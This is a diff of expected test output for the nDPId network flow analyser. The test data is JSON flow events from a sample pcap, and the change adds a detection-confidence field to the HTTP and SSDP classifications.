 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"121.248.133.93","src_port":22793,"dst_port":12757,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195852,"flow_last_seen":1467353195956,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195852,"flow_last_seen":1467353195956,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
 00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.112.31.89","src_port":22793,"dst_port":29072,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.112.31.89","src_port":22793,"dst_port":29072,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196104,"flow_last_seen":1467353196204,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":1010,"flow_avg_l4_payload_len":505,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196393,"flow_last_seen":1467353196523,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":678,"flow_avg_l4_payload_len":339,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196104,"flow_last_seen":1467353196204,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":1010,"flow_avg_l4_payload_len":505,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196393,"flow_last_seen":1467353196523,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":678,"flow_avg_l4_payload_len":339,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
 00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.41.144.153","src_port":22793,"dst_port":10492,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.41.144.153","src_port":22793,"dst_port":10492,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.223.204.67","src_port":22793,"dst_port":11102,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.223.204.67","src_port":22793,"dst_port":11102,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353167288,"flow_last_seen":1467353167373,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":785,"flow_avg_l4_payload_len":392,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157433,"flow_last_seen":1467353157718,"flow_idle_time":7440000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":463,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":420,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353170523,"flow_last_seen":1467353171307,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":594,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353190892,"flow_last_seen":1467353190978,"flow_idle_time":7440000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":443,"flow_tot_l4_payload_len":557,"flow_avg_l4_payload_len":185,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195855,"flow_last_seen":1467353195998,"flow_idle_time":7440000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196348,"flow_last_seen":1467353199417,"flow_idle_time":7440000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353167288,"flow_last_seen":1467353167373,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":785,"flow_avg_l4_payload_len":392,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157433,"flow_last_seen":1467353157718,"flow_idle_time":7440000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":463,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":420,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353170523,"flow_last_seen":1467353171307,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":594,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353190892,"flow_last_seen":1467353190978,"flow_idle_time":7440000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":443,"flow_tot_l4_payload_len":557,"flow_avg_l4_payload_len":185,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195855,"flow_last_seen":1467353195998,"flow_idle_time":7440000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196348,"flow_last_seen":1467353199417,"flow_idle_time":7440000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
 00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353136483,"flow_last_seen":1467353136483,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"183.228.182.44","dst_ip":"192.168.115.8","src_port":13913,"dst_port":22793,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353136483,"flow_last_seen":1467353136483,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"183.228.182.44","dst_ip":"192.168.115.8","src_port":13913,"dst_port":22793,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353189820,"flow_last_seen":1467353201861,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":665,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353189820,"flow_last_seen":1467353201861,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":665,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136838,"flow_last_seen":1467353136838,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.61.167.104","src_port":22793,"dst_port":17788,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136838,"flow_last_seen":1467353136838,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.61.167.104","src_port":22793,"dst_port":17788,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136836,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.61.167.82","src_port":22793,"dst_port":17788,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
@@ -538,30 +539,30 @@
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136838,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.61.39.87","src_port":22793,"dst_port":17788,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":108,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.61.39.103","src_port":22793,"dst_port":17788,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":108,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.61.39.103","src_port":22793,"dst_port":17788,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353180830,"flow_last_seen":1467353195837,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353180830,"flow_last_seen":1467353195837,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.20","src_port":22793,"dst_port":33738,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.20","src_port":22793,"dst_port":33738,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.19","src_port":22793,"dst_port":33738,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.19","src_port":22793,"dst_port":33738,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191538,"flow_last_seen":1467353191606,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191538,"flow_last_seen":1467353191606,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
